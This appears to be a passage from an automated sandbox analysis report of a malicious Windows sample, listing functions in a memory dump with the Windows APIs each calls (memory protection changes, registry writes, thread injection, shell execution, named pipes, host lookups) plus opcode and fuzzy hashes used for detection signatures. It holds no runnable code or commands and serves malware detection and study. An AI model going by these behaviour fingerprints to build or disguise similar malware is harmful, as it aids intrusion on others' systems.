                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateValue
                                                                                  • String ID: (
                                                                                  • API String ID: 2259555733-3887548279
                                                                                  • Opcode ID: 2abf53b1addb052242b1ec932d272d1fa00ea1ced80bfba167ec17a43f30b4bd
                                                                                  • Instruction ID: e9b959055dada26c43de774515bcb55da1daebc96e523e92a7157ac31ce5346f
                                                                                  • Opcode Fuzzy Hash: 2abf53b1addb052242b1ec932d272d1fa00ea1ced80bfba167ec17a43f30b4bd
                                                                                  • Instruction Fuzzy Hash: B6F062342087088FD754EF28E888626B7F0FBC8314F10491DE94EC3260DB75D9468B42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA28B8, Relevance: 3.2, APIs: 2, Instructions: 230registryfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyA.ADVAPI32 ref: 04DA28EC
                                                                                    • Part of subcall function 04DC87A8: RegQueryValueExW.KERNEL32 ref: 04DC87E8
                                                                                  • CreateFileW.KERNEL32 ref: 04DA2AF1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateFileOpenQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2015307909-0
                                                                                  • Opcode ID: 5b3dd5f698855094da2c3b45a8bdb22e2a285a93519da820d188e2a7494147b6
                                                                                  • Instruction ID: 36643cc19b75285aa215ef96698fdae90bbaa7a9e26938972a55815b69cd8a57
                                                                                  • Opcode Fuzzy Hash: 5b3dd5f698855094da2c3b45a8bdb22e2a285a93519da820d188e2a7494147b6
                                                                                  • Instruction Fuzzy Hash: C0714E30318E098FEB95EF29D894B6A73E6FBA8305F50456DD44AC3264DF38E944CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBBCA4, Relevance: 3.2, APIs: 2, Instructions: 202memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DAD7E0: VirtualProtect.KERNEL32 ref: 04DAD813
                                                                                  • VirtualProtect.KERNEL32 ref: 04DBBDC2
                                                                                  • VirtualProtect.KERNEL32 ref: 04DBBDE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 950124d88d23a561aac71dbacf1bc96c5ba35bc7ea2c6c16874dec8a5bc52678
                                                                                  • Instruction ID: 7835e23673c12bd0c570c2c02acc9e83b7201b5dddf8589ab98fed56bf2e51a5
                                                                                  • Opcode Fuzzy Hash: 950124d88d23a561aac71dbacf1bc96c5ba35bc7ea2c6c16874dec8a5bc52678
                                                                                  • Instruction Fuzzy Hash: 3E517A70618B09CFDB44EF29D8896A5B7E1FB58304F10456EE48EC7661DB34F941CB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA9330, Relevance: 3.2, APIs: 2, Instructions: 185pipeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ConnectNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 2191148154-0
                                                                                  • Opcode ID: 4ae4d87f09a1d61552437c7b3bbcd96bf8cbba49b56d8e754cef8256bb6656ce
                                                                                  • Instruction ID: 09e25fbc69a4e5465bd5424eff5f13af0d7170843e3bf8e84a79673768e0bf35
                                                                                  • Opcode Fuzzy Hash: 4ae4d87f09a1d61552437c7b3bbcd96bf8cbba49b56d8e754cef8256bb6656ce
                                                                                  • Instruction Fuzzy Hash: 5E51D870718A048FAB68EF38D89813E77E2FB98311F245A6DE45BC31A4DF74D8428B41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCB67C, Relevance: 3.2, APIs: 2, Instructions: 168fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE ref: 04DCB705
                                                                                  • MapViewOfFile.KERNELBASE ref: 04DCB731
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$CreateMappingView
                                                                                  • String ID:
                                                                                  • API String ID: 3452162329-0
                                                                                  • Opcode ID: a0571a8c3b08c8a0144110bff5bfc3fb111acd9c6aaca32dcd4ee3447d9a1e1f
                                                                                  • Instruction ID: bb38484805f8c6a4c466f40a4aaba8e1ba8c571ac87bf3975dc86314abe0efb2
                                                                                  • Opcode Fuzzy Hash: a0571a8c3b08c8a0144110bff5bfc3fb111acd9c6aaca32dcd4ee3447d9a1e1f
                                                                                  • Instruction Fuzzy Hash: DC51C730648B498FEB55EF34EC8956A77E1FB98315B00462EE88AC31A0DF78F541CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBDED4, Relevance: 3.1, APIs: 2, Instructions: 139registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ClassCreateRegisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3469048531-0
                                                                                  • Opcode ID: 5fb5d5a20dcbd6153e0a03aa6c7a5d782f66df663edb0c0595287bbc6acdf86b
                                                                                  • Instruction ID: 1d6245a59ae5c96acf12dde42fcacbe051efcb715b32a59df830307bf3f89c12
                                                                                  • Opcode Fuzzy Hash: 5fb5d5a20dcbd6153e0a03aa6c7a5d782f66df663edb0c0595287bbc6acdf86b
                                                                                  • Instruction Fuzzy Hash: 77412D30608B44CFD765EF64D8896AABBE1FB98311F104A2EE497C3660DF74E445CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB2DE8, Relevance: 3.1, APIs: 2, Instructions: 123fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ReadFile.KERNEL32 ref: 04DB2E7A
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DB2EF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFileFindNotificationRead
                                                                                  • String ID:
                                                                                  • API String ID: 1200561807-0
                                                                                  • Opcode ID: 810bf4921cbed158919d0fb215e451858da5e23870537f71e5f8262922d4a544
                                                                                  • Instruction ID: cd290588911e5b105df2b0ff1a679aa73c7fa1b1646d813e277e4b6afec6581a
                                                                                  • Opcode Fuzzy Hash: 810bf4921cbed158919d0fb215e451858da5e23870537f71e5f8262922d4a544
                                                                                  • Instruction Fuzzy Hash: 883195316187448FD768EF64E88D6A677E4FB98301F10456EE88BC7251EF30D8858B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBB424, Relevance: 3.1, APIs: 2, Instructions: 106fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: File$CreateRead
                                                                                  • String ID:
                                                                                  • API String ID: 3388366904-0
                                                                                  • Opcode ID: 14461146b57bedce479a0fef2a8d51b8a485c857de0ad3e7b1c9097063876b91
                                                                                  • Instruction ID: ef3cda6b1e53c9292aac9c0cb4af8b390aae8d8a5a1ca5fd0eac16bca51ccec2
                                                                                  • Opcode Fuzzy Hash: 14461146b57bedce479a0fef2a8d51b8a485c857de0ad3e7b1c9097063876b91
                                                                                  • Instruction Fuzzy Hash: 8C31BB3020CB098FE754EF6998893A576E1FB98315F10852AD98FC3661DB38E8418792
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB7314, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  • Opcode ID: 32b1309e94cb88c0bfd55d5708309a216c1990809e1b297a98f9908f7531cb90
                                                                                  • Instruction ID: 04b7ac8e271f50a029162b0570866e7851765d9bf1c321add6e45266773d75e9
                                                                                  • Opcode Fuzzy Hash: 32b1309e94cb88c0bfd55d5708309a216c1990809e1b297a98f9908f7531cb90
                                                                                  • Instruction Fuzzy Hash: 75217731618B088FDB54EF28E84966577E1FB98311F15446EE89AC3361EB74E941CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBA7AC, Relevance: 3.1, APIs: 2, Instructions: 67registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 04DC3A14: RegCreateKeyA.ADVAPI32 ref: 04DC3A37
                                                                                  • RegSetValueExA.KERNEL32 ref: 04DBA809
                                                                                  • RegCloseKey.KERNEL32 ref: 04DBA81E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID:
                                                                                  • API String ID: 1818849710-0
                                                                                  • Opcode ID: 9868bd7629c01bbebcd534621a39b42b091bd3cd503ca62e783f9c09c6bff772
                                                                                  • Instruction ID: 2b7fd72b990ccf84f2d13f18f6eca0d1423b96a47af229e0b59ee93055ab15c6
                                                                                  • Opcode Fuzzy Hash: 9868bd7629c01bbebcd534621a39b42b091bd3cd503ca62e783f9c09c6bff772
                                                                                  • Instruction Fuzzy Hash: 46110974608B088FD794EF5C9449669B7E1FB9C310F11456EA88EC3322EA74EC428B83
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC3A14, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  • Opcode ID: 3045a727d588193b2caeebc6a9ce336b2dba51846389aaf45621cbdd53b36981
                                                                                  • Instruction ID: 5bc83c9010839a3e28b8d48b3f4904c507dee95b9c09e8c2239c1fb5ce8f416f
                                                                                  • Opcode Fuzzy Hash: 3045a727d588193b2caeebc6a9ce336b2dba51846389aaf45621cbdd53b36981
                                                                                  • Instruction Fuzzy Hash: 4701803061CA4A8FDB44EF5C9488629FBE1FBAC315F10442EE84EC3260DAB4D9458782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DBFAD4, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueueThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3600083758-0
                                                                                  • Opcode ID: 6ee91ad08121308be91f958084160060ae6e19dd136481cb6343f576b16d76db
                                                                                  • Instruction ID: d5fa5bdfcb301ca8a178ba440c77d70c132ced782ab6210ac1f21c38406a76b6
                                                                                  • Opcode Fuzzy Hash: 6ee91ad08121308be91f958084160060ae6e19dd136481cb6343f576b16d76db
                                                                                  • Instruction Fuzzy Hash: 17015E31754E088FEB94EF2DA85DB79B7E2F798711704856AA40AC3260DF38DD418782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC5028, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: f9bae9e0bdd93042823327556d740cc65595436eca48a2376daa81d9f037e0d9
                                                                                  • Instruction ID: 298b2bf7b824b94ab1df7ea2e2aed2902a28597598d9d030120f70fd3fe5f6e3
                                                                                  • Opcode Fuzzy Hash: f9bae9e0bdd93042823327556d740cc65595436eca48a2376daa81d9f037e0d9
                                                                                  • Instruction Fuzzy Hash: ED617970618F059FD754EF58E899A66B7E1FB68301F50466EE88AC3251EB34F841CBC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA719C, Relevance: 1.7, APIs: 1, Instructions: 175registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Value
                                                                                  • String ID:
                                                                                  • API String ID: 3702945584-0
                                                                                  • Opcode ID: d89c2cad520323d3038b574bbce1ebed491271846b5711f3b450ea623b88d57f
                                                                                  • Instruction ID: dc9e0eded9dc7912ce267a5cf5834a379f9d0edb502d9f29b910ca1a7910ba88
                                                                                  • Opcode Fuzzy Hash: d89c2cad520323d3038b574bbce1ebed491271846b5711f3b450ea623b88d57f
                                                                                  • Instruction Fuzzy Hash: 4751A570708F098FE764DF6CD88962677E5FB98301F10462EA44AC7261DF34E845CB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC2964, Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2779144e08e5d25981183b59fc4051b40473f8f68c32ba242818e81fbd5793fe
                                                                                  • Instruction ID: 2761d13e07aeab88f2de21348ed37a2ab75dcf760e662357a258696cd71e0cf9
                                                                                  • Opcode Fuzzy Hash: 2779144e08e5d25981183b59fc4051b40473f8f68c32ba242818e81fbd5793fe
                                                                                  • Instruction Fuzzy Hash: 5251597252C6C58FC3038B7488AA1F17FB0EF5B219B1809CDC4C18F023E625A157DB4A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB9370, Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlAddVectoredContinueHandler.NTDLL ref: 04DB94C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContinueHandlerVectored
                                                                                  • String ID:
                                                                                  • API String ID: 3758255415-0
                                                                                  • Opcode ID: 9362112fee9ad7024f1cada21a9f97ec611ea1340ee70af9d56cb3bcbf80f2bf
                                                                                  • Instruction ID: a95559ee24227686f53ac7c894840cee0a3a25e0b0fb463f83a154f50f9be815
                                                                                  • Opcode Fuzzy Hash: 9362112fee9ad7024f1cada21a9f97ec611ea1340ee70af9d56cb3bcbf80f2bf
                                                                                  • Instruction Fuzzy Hash: 7C41167060CA49DFEB64EFA898682AA77E1FB98315B5441AED487C3260DF38D442CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC441C, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ExecuteShell
                                                                                  • String ID:
                                                                                  • API String ID: 587946157-0
                                                                                  • Opcode ID: e60fa253a95186790df38764bd1695c451999348a23a9d2854310a58d0a2b1e5
                                                                                  • Instruction ID: afbd798380eae0d548b1f88f38e927702d489e786bfc34030851bf2bac7ff029
                                                                                  • Opcode Fuzzy Hash: e60fa253a95186790df38764bd1695c451999348a23a9d2854310a58d0a2b1e5
                                                                                  • Instruction Fuzzy Hash: BD415071618F188FE758EF28EC8966577E1F798701B10456ED48BC3261EB34E941CBC2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC5688, Relevance: 1.6, APIs: 1, Instructions: 136pipeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CallNamedPipe
                                                                                  • String ID:
                                                                                  • API String ID: 1741058652-0
                                                                                  • Opcode ID: 4d390cd729165902c8d43e190fe45b5a0b7b8548fab63dc3aba9c6a747f5afa8
                                                                                  • Instruction ID: 61aeef550386abf9064d57d35487d685b6b5e37cf151052adbe0472a89708ae4
                                                                                  • Opcode Fuzzy Hash: 4d390cd729165902c8d43e190fe45b5a0b7b8548fab63dc3aba9c6a747f5afa8
                                                                                  • Instruction Fuzzy Hash: AC41C071618B198FD718EF58E89967677E4FB59310F04416EE88AC3262EB70F841CB86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB694C, Relevance: 1.6, APIs: 1, Instructions: 119networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: gethostbyname
                                                                                  • String ID:
                                                                                  • API String ID: 930432418-0
                                                                                  • Opcode ID: 5c37b56db9cb6ba20a16186a7353cbe05d809d19c8b065b0534cf8e950daa7c6
                                                                                  • Instruction ID: 5cf5bf11945efb891263fb3a8001b24cbfeee90478b1c4b23cc4a5b43686e3c7
                                                                                  • Opcode Fuzzy Hash: 5c37b56db9cb6ba20a16186a7353cbe05d809d19c8b065b0534cf8e950daa7c6
                                                                                  • Instruction Fuzzy Hash: D1318731748A1C8F9F58EF69E88957977E2FB99301714843DD98FC3220DA74D946C782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC29CD, Relevance: 1.6, APIs: 1, Instructions: 116timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: TimerWaitable
                                                                                  • String ID:
                                                                                  • API String ID: 1823812067-0
                                                                                  • Opcode ID: 4b9a97ed7b6f77fd0630795fa24b1fb3f15e7eb75c02753cca7e70ab6d89b66d
                                                                                  • Instruction ID: b4e676e7d21488b835370c5cdd0e28b64cd56a655f73c122f3aae10bed407d49
                                                                                  • Opcode Fuzzy Hash: 4b9a97ed7b6f77fd0630795fa24b1fb3f15e7eb75c02753cca7e70ab6d89b66d
                                                                                  • Instruction Fuzzy Hash: AC418D7252C6C58FC7039B7488AA1E5BFB0EF5B319B0809CEC4C5CF062D625A197DB46
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA549C, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 4b1297742507f9654b15d5a838ba5ce0d5845aa651fc884adb9eac90df9abffa
                                                                                  • Instruction ID: 6fc85e8f5c86bda6d4049b5de0afb2a73b124d515d664fea0d5423b20072d9b0
                                                                                  • Opcode Fuzzy Hash: 4b1297742507f9654b15d5a838ba5ce0d5845aa651fc884adb9eac90df9abffa
                                                                                  • Instruction Fuzzy Hash: A5314F7060CB088FDB54EF1C9489666B7E5FB98311F00466EE84DC3361DB30EC458B86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC972C, Relevance: 1.6, APIs: 1, Instructions: 106registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: d2c25c1e1ff8bc29aee534cc62c6e3de31c0e20af7086c6dcd67828c84e123a1
                                                                                  • Instruction ID: 7131cc9fd2acb98d00fa0a3cfde2a2461506df7f972576ea7709509e3a09bd33
                                                                                  • Opcode Fuzzy Hash: d2c25c1e1ff8bc29aee534cc62c6e3de31c0e20af7086c6dcd67828c84e123a1
                                                                                  • Instruction Fuzzy Hash: E6314D74718B498FDB84EF28D898B6AB7E1FF98301F40496DE44AC3260DB34D940CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC87A8, Relevance: 1.6, APIs: 1, Instructions: 105registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: a2caa9da2c6d77e6686aea1c4a315f76dc63914ad799ac8ee7c75ee28d23a3a7
                                                                                  • Instruction ID: 319dd58a9b0a9b6ce4bcf6e1a524821732fe10dc6a39e5e270298ffaccb7016a
                                                                                  • Opcode Fuzzy Hash: a2caa9da2c6d77e6686aea1c4a315f76dc63914ad799ac8ee7c75ee28d23a3a7
                                                                                  • Instruction Fuzzy Hash: FA314430718B098FEB48EF29E489A6677E1FB98351F10456EF84AC3655DF34D841DB82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DC6294, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 04DC6363
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryDeleteDescriptor
                                                                                  • String ID:
                                                                                  • API String ID: 3203483114-0
                                                                                  • Opcode ID: 606ac2f4c451d30f9a48487e7ff44147a093233b41ffd460391cff885743281a
                                                                                  • Instruction ID: 8d169f978d1936e77f60af6d648fcca03413bdb99c3850d346e6b6b0cee6a6c0
                                                                                  • Opcode Fuzzy Hash: 606ac2f4c451d30f9a48487e7ff44147a093233b41ffd460391cff885743281a
                                                                                  • Instruction Fuzzy Hash: 41215E3170CB0A8FE754EB5DEC49666B7D2FB98751F04453EE849C3261EA74E84287C1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DAA7D4, Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 04DAA876
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryDeleteDescriptor
                                                                                  • String ID:
                                                                                  • API String ID: 3203483114-0
                                                                                  • Opcode ID: 73820ac6e7aedd73fd32158238ee42c8a997d8c6612961addbaef7e68cf9f3c5
                                                                                  • Instruction ID: f7f36604abef2c016cdb65f797ee1ceb098b0bc053895d1f3e23b92133913dde
                                                                                  • Opcode Fuzzy Hash: 73820ac6e7aedd73fd32158238ee42c8a997d8c6612961addbaef7e68cf9f3c5
                                                                                  • Instruction Fuzzy Hash: 94219234718A0C4FEB98EF69A84522977E2F799300B10852DE55FC3251DE24E852C782
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA8684, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNEL32 ref: 04DA8754
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  • Opcode ID: 6972df71bf321d5bc9234570ca29369fdb6b86b7d058dbb9c12c5d172f9e93a0
                                                                                  • Instruction ID: 3920b86d89c91b39dbe1fbf652906e3552cf700f33a8a5abc9543bd7c7d3a868
                                                                                  • Opcode Fuzzy Hash: 6972df71bf321d5bc9234570ca29369fdb6b86b7d058dbb9c12c5d172f9e93a0
                                                                                  • Instruction Fuzzy Hash: AE21A9307186054FDB59FF2998986AA73E6FB98301B10443DEC8BC3251EE34E956C792
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DCE614, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTempFileNameA.KERNEL32(?,?,?,?,?,?,000003EE,04DCD3FF), ref: 04DCE68B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: FileNameTemp
                                                                                  • String ID:
                                                                                  • API String ID: 745986568-0
                                                                                  • Opcode ID: 22c1ca8c8c66b415ec0812543e2076769a485330e46bb8cf05f07d494ae3f5f2
                                                                                  • Instruction ID: 71cee033b071829609ab77cb9fdf56cd6c4295ebdcb35cc614f84e3729e75c69
                                                                                  • Opcode Fuzzy Hash: 22c1ca8c8c66b415ec0812543e2076769a485330e46bb8cf05f07d494ae3f5f2
                                                                                  • Instruction Fuzzy Hash: 10215471758A058FEB58EF69AC8863A37E2FBDC311B48453DA506C3264DE38D8018746
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DB5610, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: aff18308975ca36fe600169f48f04ab1df9d55e800e96a0c9cc7ec57bc93844f
                                                                                  • Instruction ID: ea04aa6d478682159bfeef48ad2eb3c9e952c67f235867a7e2cdd66ce34b64ef
                                                                                  • Opcode Fuzzy Hash: aff18308975ca36fe600169f48f04ab1df9d55e800e96a0c9cc7ec57bc93844f
                                                                                  • Instruction Fuzzy Hash: 77212C34208A48CFD754EF68D8D896AB7E1FBD8305F100A2EE58AC3120DB79E945CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 04DA3DB0, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000020.00000002.1031943973.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 4241100979-0
                                                                                  • Opcode ID: 1eec45686fddf13bea5f4836158066747e5c8b58f39936e948259d7e55331bdb
                                                                                  • Instruction ID: 46c722bd6c478e28f2cac7b9a31c6d7e1922f3387b518521bf0f055627737022
                                                                                  • Opcode Fuzzy Hash: 1eec45686fddf13bea5f4836158066747e5c8b58f39936e948259d7e55331bdb
                                                                                  • Instruction Fuzzy Hash: 29214230608E0D8FEB98FF2D984966577E2FB9C301B554179E44EC3264DB38D9428B82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

